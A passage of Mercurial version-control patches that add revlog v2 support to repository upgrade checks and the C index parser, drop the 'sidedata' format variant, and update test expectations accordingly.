Introduced in Mercurial 0.9.2. requirements.STORE_REQUIREMENT, } @@ -881,9 +893,21 @@ } +def check_revlog_version(reqs): + """Check that the requirements contain at least one Revlog version""" + all_revlogs = { + requirements.REVLOGV1_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, + } + if not all_revlogs.intersection(reqs): + msg = _(b'cannot upgrade repository; missing a revlog version') + raise error.Abort(msg) + + def check_source_requirements(repo): """Ensure that no existing requirements prevent the repository upgrade""" + check_revlog_version(repo.requirements) required = requiredsourcerequirements(repo) missingreqs = required - repo.requirements if missingreqs: @@ -915,6 +939,8 @@ requirements.COPIESSDC_REQUIREMENT, requirements.NODEMAP_REQUIREMENT, requirements.SHARESAFE_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, + requirements.REVLOGV1_REQUIREMENT, } for name in compression.compengines: engine = compression.compengines[name] @@ -937,13 +963,14 @@ requirements.DOTENCODE_REQUIREMENT, requirements.FNCACHE_REQUIREMENT, requirements.GENERALDELTA_REQUIREMENT, - requirements.REVLOGV1_REQUIREMENT, + requirements.REVLOGV1_REQUIREMENT, # allowed in case of downgrade requirements.STORE_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, requirements.COPIESSDC_REQUIREMENT, requirements.NODEMAP_REQUIREMENT, requirements.SHARESAFE_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, } for name in compression.compengines: engine = compression.compengines[name] @@ -973,6 +1000,8 @@ requirements.COPIESSDC_REQUIREMENT, requirements.NODEMAP_REQUIREMENT, requirements.SHARESAFE_REQUIREMENT, + requirements.REVLOGV1_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, } for name in compression.compengines: engine = compression.compengines[name] @@ -985,7 +1014,7 @@ def check_requirements_changes(repo, new_reqs): old_reqs = repo.requirements - + check_revlog_version(repo.requirements) support_removal = supportremovedrequirements(repo) no_remove_reqs = old_reqs - new_reqs - support_removal if no_remove_reqs: diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1469,6 +1469,7 @@ sidedata: no yes no persistent-nodemap: no no no copies-sdc: no yes no + revlog-v2: no yes no plain-cl-delta: yes yes yes compression: * (glob) compression-level: default default default @@ -1477,7 +1478,8 @@ requirements preserved: * (glob) - added: exp-copies-sidedata-changeset, exp-sidedata-flag + removed: revlogv1 + added: exp-copies-sidedata-changeset, exp-revlogv2.2, exp-sidedata-flag processed revlogs: - all-filelogs @@ -1507,6 +1509,7 @@ sidedata: no yes no persistent-nodemap: no no no copies-sdc: no yes no + revlog-v2: no yes no plain-cl-delta: yes yes yes compression: * (glob) compression-level: default default default @@ -1515,7 +1518,8 @@ requirements preserved: * (glob) - added: exp-copies-sidedata-changeset, exp-sidedata-flag + removed: revlogv1 + added: exp-copies-sidedata-changeset, exp-revlogv2.2, exp-sidedata-flag processed revlogs: - all-filelogs diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -42,6 +42,7 @@ sidedata: yes yes no persistent-nodemap: no no no copies-sdc: yes yes no + revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -56,6 +57,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -427,6 +429,7 @@ sidedata: yes yes no persistent-nodemap: no no no copies-sdc: yes yes no + revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -453,6 +456,7 @@ sidedata: yes yes no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -481,6 +485,7 @@ sidedata: yes yes no persistent-nodemap: no no no copies-sdc: yes yes no + revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -59,6 +59,7 @@ sidedata: no persistent-nodemap: yes copies-sdc: no + revlog-v2: no plain-cl-delta: yes compression: zlib compression-level: default @@ -578,6 +579,7 @@ sidedata: no no no persistent-nodemap: yes no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -623,6 +625,7 @@ sidedata: no no no persistent-nodemap: no yes no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default diff --git a/tests/test-sidedata.t b/tests/test-sidedata.t --- a/tests/test-sidedata.t +++ b/tests/test-sidedata.t @@ -59,6 +59,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -72,6 +73,7 @@ sidedata: no yes no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -91,6 +93,7 @@ sidedata: yes no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: yes no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -104,6 +107,7 @@ sidedata: yes no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: yes no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -21,7 +21,7 @@ > EOF $ hg -R no-revlogv1 debugupgraderepo - abort: cannot upgrade repository; requirement missing: revlogv1 + abort: cannot upgrade repository; missing a revlog version [255] Cannot upgrade shared repositories @@ -61,6 +61,7 @@ sidedata: no persistent-nodemap: no copies-sdc: no + revlog-v2: no plain-cl-delta: yes compression: zlib compression-level: default @@ -74,6 +75,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -87,6 +89,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -100,6 +103,7 @@ [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] [formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default] @@ -154,6 +158,12 @@ "repo": false }, { + "config": false, + "default": false, + "name": "revlog-v2", + "repo": false + }, + { "config": true, "default": true, "name": "plain-cl-delta", @@ -306,6 +316,7 @@ sidedata: no persistent-nodemap: no copies-sdc: no + revlog-v2: no plain-cl-delta: yes compression: zlib compression-level: default @@ -319,6 +330,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -332,6 +344,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -345,6 +358,7 @@ [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] [formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default] @@ -1288,6 +1302,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zstd zlib zlib compression-level: default default default @@ -1324,6 +1339,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default @@ -1363,6 +1379,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zstd zstd zlib compression-level: default default default @@ -1386,10 +1403,11 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) - added: exp-sidedata-flag (zstd !) - added: exp-sidedata-flag, sparserevlog (no-zstd !) + preserved: dotencode, fncache, generaldelta, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd !) + removed: revlogv1 + added: exp-revlogv2.2, exp-sidedata-flag (zstd !) + added: exp-revlogv2.2, exp-sidedata-flag, sparserevlog (no-zstd !) processed revlogs: - all-filelogs @@ -1406,17 +1424,18 @@ sidedata: yes no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: yes no no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) compression: zstd zstd zlib (zstd !) compression-level: default default default $ cat .hg/requires dotencode + exp-revlogv2.2 exp-sidedata-flag fncache generaldelta revlog-compression-zstd (zstd !) - revlogv1 sparserevlog store $ hg debugsidedata -c 0 @@ -1430,9 +1449,10 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) - removed: exp-sidedata-flag + preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd !) + removed: exp-revlogv2.2, exp-sidedata-flag + added: revlogv1 processed revlogs: - all-filelogs @@ -1449,6 +1469,7 @@ sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) compression: zstd zstd zlib (zstd !) @@ -1473,9 +1494,10 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) - added: exp-sidedata-flag + preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd !) + removed: revlogv1 + added: exp-revlogv2.2, exp-sidedata-flag processed revlogs: - all-filelogs @@ -1492,17 +1514,18 @@ sidedata: yes yes no persistent-nodemap: no no no copies-sdc: no no no + revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) compression: zstd zstd zlib (zstd !) compression-level: default default default $ cat .hg/requires dotencode + exp-revlogv2.2 exp-sidedata-flag fncache generaldelta revlog-compression-zstd (zstd !) - revlogv1 sparserevlog store $ hg debugsidedata -c 0 # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614848106 -3600 # Thu Mar 04 09:55:06 2021 +0100 # Node ID 7d9d9265d40fe8e05fe881d26e5566bdc0226af6 # Parent fd55a9eb1507dfa787e8b4ef95b3bda9fe178e0b format: remove sidedata format variant This format variant can only exist when also using revlog v2, so it's useless now. Differential Revision: https://phab.mercurial-scm.org/D10113 diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -325,27 +325,6 @@ @registerformatvariant -class sidedata(requirementformatvariant): - name = b'sidedata' - - _requirement = requirements.REVLOGV2_REQUIREMENT - - default = False - - description = _( - b'Allows storage of extra data alongside a revision, ' - b'unlocking various caching options.' - ) - - upgrademessage = _(b'Allows storage of extra data alongside a revision.') - - @classmethod - def fromrepo(cls, repo): - assert cls._requirement is not None - return cls._requirement in repo.requirements - - -@registerformatvariant class persistentnodemap(requirementformatvariant): name = b'persistent-nodemap' diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1466,7 +1466,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no yes no persistent-nodemap: no no no copies-sdc: no yes no revlog-v2: no yes no @@ -1506,7 +1505,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no yes no persistent-nodemap: no no no copies-sdc: no yes no revlog-v2: no yes no diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -39,7 +39,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no persistent-nodemap: no no no copies-sdc: yes yes no revlog-v2: yes yes no @@ -54,7 +53,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -426,7 +424,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no persistent-nodemap: no no no copies-sdc: yes yes no revlog-v2: yes yes no @@ -453,7 +450,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: yes yes no @@ -482,7 +478,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no persistent-nodemap: no no no copies-sdc: yes yes no revlog-v2: yes yes no diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -56,7 +56,6 @@ generaldelta: yes share-safe: no sparserevlog: yes - sidedata: no persistent-nodemap: yes copies-sdc: no revlog-v2: no @@ -576,7 +575,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: yes no no copies-sdc: no no no revlog-v2: no no no @@ -622,7 +620,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no yes no copies-sdc: no no no revlog-v2: no no no diff --git a/tests/test-sidedata.t b/tests/test-sidedata.t --- a/tests/test-sidedata.t +++ b/tests/test-sidedata.t @@ -56,7 +56,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -70,7 +69,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no yes no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no yes no @@ -90,7 +88,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: yes no no @@ -104,7 +101,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: yes no no diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -58,7 +58,6 @@ generaldelta: yes share-safe: no sparserevlog: yes - sidedata: no persistent-nodemap: no copies-sdc: no revlog-v2: no @@ -72,7 +71,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -86,7 +84,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -100,7 +97,6 @@ [formatvariant.name.uptodate|generaldelta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|sparserevlog: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] @@ -142,12 +138,6 @@ { "config": false, "default": false, - "name": "sidedata", - "repo": false - }, - { - "config": false, - "default": false, "name": "persistent-nodemap", "repo": false }, @@ -313,7 +303,6 @@ generaldelta: no share-safe: no sparserevlog: no - sidedata: no persistent-nodemap: no copies-sdc: no revlog-v2: no @@ -327,7 +316,6 @@ generaldelta: no yes yes share-safe: no no no sparserevlog: no yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -341,7 +329,6 @@ generaldelta: no no yes share-safe: no no no sparserevlog: no no yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -355,7 +342,6 @@ [formatvariant.name.mismatchdefault|generaldelta: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.mismatchdefault|sparserevlog: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] - [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] @@ -1299,7 +1285,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -1336,7 +1321,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -1376,7 +1360,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -1421,7 +1404,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: yes no no @@ -1466,7 +1448,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: no no no @@ -1511,7 +1492,6 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no persistent-nodemap: no no no copies-sdc: no no no revlog-v2: yes yes no # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1610962992 -3600 # Mon Jan 18 10:43:12 2021 +0100 # Node ID eed42f1c22d6154f931b525ee491e7ecf80f7845 # Parent 7d9d9265d40fe8e05fe881d26e5566bdc0226af6 bitmanipulation: add utils to read/write bigendian 64bit integers Differential Revision: https://phab.mercurial-scm.org/D9845 diff --git a/mercurial/bitmanipulation.h b/mercurial/bitmanipulation.h --- a/mercurial/bitmanipulation.h +++ b/mercurial/bitmanipulation.h @@ -5,6 +5,18 @@ #include "compat.h" +/* Reads a 64 bit integer from big-endian bytes. Assumes that the data is long + enough */ +static inline uint64_t getbe64(const char *c) +{ + const unsigned char *d = (const unsigned char *)c; + + return ((((uint64_t)d[0]) << 56) | (((uint64_t)d[1]) << 48) | + (((uint64_t)d[2]) << 40) | (((uint64_t)d[3]) << 32) | + (((uint64_t)d[4]) << 24) | (((uint64_t)d[5]) << 16) | + (((uint64_t)d[6]) << 8) | (d[7])); +} + static inline uint32_t getbe32(const char *c) { const unsigned char *d = (const unsigned char *)c; @@ -27,6 +39,20 @@ return ((d[0] << 8) | (d[1])); } +/* Writes a 64 bit integer to bytes in a big-endian format. + Assumes that the buffer is long enough */ +static inline void putbe64(uint64_t x, char *c) +{ + c[0] = (x >> 56) & 0xff; + c[1] = (x >> 48) & 0xff; + c[2] = (x >> 40) & 0xff; + c[3] = (x >> 32) & 0xff; + c[4] = (x >> 24) & 0xff; + c[5] = (x >> 16) & 0xff; + c[6] = (x >> 8) & 0xff; + c[7] = (x)&0xff; +} + static inline void putbe32(uint32_t x, char *c) { c[0] = (x >> 24) & 0xff; # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1611164112 -3600 # Wed Jan 20 18:35:12 2021 +0100 # Node ID 358737abeeefc68da1bbceba5f4fb27eaa5149aa # Parent eed42f1c22d6154f931b525ee491e7ecf80f7845 cext: add support for revlogv2 This enables the C code to retrieve/create entries in the revlog v2 format. This is mainly a matter of taking into account the additional slots for sidedata, etc. Differential Revision: https://phab.mercurial-scm.org/D9846 diff --git a/mercurial/cext/parsers.c b/mercurial/cext/parsers.c --- a/mercurial/cext/parsers.c +++ b/mercurial/cext/parsers.c @@ -638,7 +638,7 @@ PyObject *encodedir(PyObject *self, PyObject *args); PyObject *pathencode(PyObject *self, PyObject *args); PyObject *lowerencode(PyObject *self, PyObject *args); -PyObject *parse_index2(PyObject *self, PyObject *args); +PyObject *parse_index2(PyObject *self, PyObject *args, PyObject *kwargs); static PyMethodDef methods[] = { {"pack_dirstate", pack_dirstate, METH_VARARGS, "pack a dirstate\n"}, @@ -646,7 +646,8 @@ "create a set containing non-normal and other parent entries of given " "dirstate\n"}, {"parse_dirstate", parse_dirstate, METH_VARARGS, "parse a dirstate\n"}, - {"parse_index2", parse_index2, METH_VARARGS, "parse a revlog index\n"}, + {"parse_index2", (PyCFunction)parse_index2, METH_VARARGS | METH_KEYWORDS, + "parse a revlog index\n"}, {"isasciistr", isasciistr, METH_VARARGS, "check if an ASCII string\n"}, {"asciilower", asciilower, METH_VARARGS, "lowercase an ASCII string\n"}, {"asciiupper", asciiupper, METH_VARARGS, "uppercase an ASCII string\n"}, diff --git a/mercurial/cext/revlog.c b/mercurial/cext/revlog.c --- a/mercurial/cext/revlog.c +++ b/mercurial/cext/revlog.c @@ -98,6 +98,7 @@ int ntlookups; /* # lookups */ int ntmisses; /* # lookups that miss the cache */ int inlined; + long hdrsize; /* size of index headers. Differs in v1 v.s. v2 format */ }; static Py_ssize_t index_length(const indexObject *self) @@ -113,14 +114,21 @@ static int index_find_node(indexObject *self, const char *node); #if LONG_MAX == 0x7fffffffL -static const char *const tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#"); +static const char *const v1_tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#"); +static const char *const v2_tuple_format = + PY23("Kiiiiiis#Ki", "Kiiiiiiy#Ki"); #else -static const char *const tuple_format = PY23("kiiiiiis#", "kiiiiiiy#"); +static const char *const v1_tuple_format = PY23("kiiiiiis#", "kiiiiiiy#"); +static const char *const v2_tuple_format = + PY23("kiiiiiis#ki", "kiiiiiiy#ki"); #endif /* A RevlogNG v1 index entry is 64 bytes long. */ static const long v1_hdrsize = 64; +/* A Revlogv2 index entry is 96 bytes long. */ +static const long v2_hdrsize = 96; + static void raise_revlog_error(void) { PyObject *mod = NULL, *dict = NULL, *errclass = NULL; @@ -157,7 +165,7 @@ static const char *index_deref(indexObject *self, Py_ssize_t pos) { if (pos >= self->length) - return self->added + (pos - self->length) * v1_hdrsize; + return self->added + (pos - self->length) * self->hdrsize; if (self->inlined && pos > 0) { if (self->offsets == NULL) { @@ -174,7 +182,7 @@ return self->offsets[pos]; } - return (const char *)(self->buf.buf) + pos * v1_hdrsize; + return (const char *)(self->buf.buf) + pos * self->hdrsize; } /* @@ -280,8 +288,9 @@ */ static PyObject *index_get(indexObject *self, Py_ssize_t pos) { - uint64_t offset_flags; - int comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2; + uint64_t offset_flags, sidedata_offset; + int comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2, + sidedata_comp_len; const char *c_node_id; const char *data; Py_ssize_t length = index_length(self); @@ -320,9 +329,19 @@ parent_2 = getbe32(data + 28); c_node_id = data + 32; - return Py_BuildValue(tuple_format, offset_flags, comp_len, uncomp_len, - base_rev, link_rev, parent_1, parent_2, c_node_id, - self->nodelen); + if (self->hdrsize == v1_hdrsize) { + return Py_BuildValue(v1_tuple_format, offset_flags, comp_len, + uncomp_len, base_rev, link_rev, parent_1, + parent_2, c_node_id, self->nodelen); + } else { + sidedata_offset = getbe64(data + 64); + sidedata_comp_len = getbe32(data + 72); + + return Py_BuildValue(v2_tuple_format, offset_flags, comp_len, + uncomp_len, base_rev, link_rev, parent_1, + parent_2, c_node_id, self->nodelen, + sidedata_offset, sidedata_comp_len); + } } /* @@ -373,18 +392,30 @@ static PyObject *index_append(indexObject *self, PyObject *obj) { - uint64_t offset_flags; + uint64_t offset_flags, sidedata_offset; int rev, comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2; - Py_ssize_t c_node_id_len; + Py_ssize_t c_node_id_len, sidedata_comp_len; const char *c_node_id; char *data; - if (!PyArg_ParseTuple(obj, tuple_format, &offset_flags, &comp_len, - &uncomp_len, &base_rev, &link_rev, &parent_1, - &parent_2, &c_node_id, &c_node_id_len)) { - PyErr_SetString(PyExc_TypeError, "8-tuple required"); - return NULL; + if (self->hdrsize == v1_hdrsize) { + if (!PyArg_ParseTuple(obj, v1_tuple_format, &offset_flags, + &comp_len, &uncomp_len, &base_rev, + &link_rev, &parent_1, &parent_2, + &c_node_id, &c_node_id_len)) { + PyErr_SetString(PyExc_TypeError, "8-tuple required"); + return NULL; + } + } else { + if (!PyArg_ParseTuple( + obj, v2_tuple_format, &offset_flags, &comp_len, + &uncomp_len, &base_rev, &link_rev, &parent_1, &parent_2, + &c_node_id, &c_node_id_len, &sidedata_offset, &sidedata_comp_len)) { + PyErr_SetString(PyExc_TypeError, "10-tuple required"); + return NULL; + } } + if (c_node_id_len != self->nodelen) { PyErr_SetString(PyExc_TypeError, "invalid node"); return NULL; @@ -393,15 +424,15 @@ if (self->new_length == self->added_length) { size_t new_added_length = self->added_length ? self->added_length * 2 : 4096; - void *new_added = - PyMem_Realloc(self->added, new_added_length * v1_hdrsize); + void *new_added = PyMem_Realloc(self->added, new_added_length * + self->hdrsize); if (!new_added) return PyErr_NoMemory(); self->added = new_added; self->added_length = new_added_length; } rev = self->length + self->new_length; - data = self->added + v1_hdrsize * self->new_length++; + data = self->added + self->hdrsize * self->new_length++; putbe32(offset_flags >> 32, data); putbe32(offset_flags & 0xffffffffU, data + 4); putbe32(comp_len, data + 8); @@ -411,7 +442,14 @@ putbe32(parent_1, data + 24); putbe32(parent_2, data + 28); memcpy(data + 32, c_node_id, c_node_id_len); + /* Padding since SHA-1 is only 20 bytes for now */ memset(data + 32 + c_node_id_len, 0, 32 - c_node_id_len); + if (self->hdrsize != v1_hdrsize) { + putbe64(sidedata_offset, data + 64); + putbe32(sidedata_comp_len, data + 72); + /* Padding for 96 bytes alignment */ + memset(data + 76, 0, self->hdrsize - 76); + } if (self->ntinitialized) nt_insert(&self->nt, c_node_id, rev); @@ -2563,14 +2601,17 @@ const char *data = (const char *)self->buf.buf; Py_ssize_t pos = 0; Py_ssize_t end = self->buf.len; - long incr = v1_hdrsize; + long incr = self->hdrsize; Py_ssize_t len = 0; - while (pos + v1_hdrsize <= end && pos >= 0) { - uint32_t comp_len; + while (pos + self->hdrsize <= end && pos >= 0) { + uint32_t comp_len, sidedata_comp_len = 0; /* 3rd element of header is length of compressed inline data */ comp_len = getbe32(data + pos + 8); - incr = v1_hdrsize + comp_len; + if (self->hdrsize == v2_hdrsize) { + sidedata_comp_len = getbe32(data + pos + 72); + } + incr = self->hdrsize + comp_len + sidedata_comp_len; if (offsets) offsets[len] = data + pos; len++; @@ -2586,11 +2627,13 @@ return len; } -static int index_init(indexObject *self, PyObject *args) +static int index_init(indexObject *self, 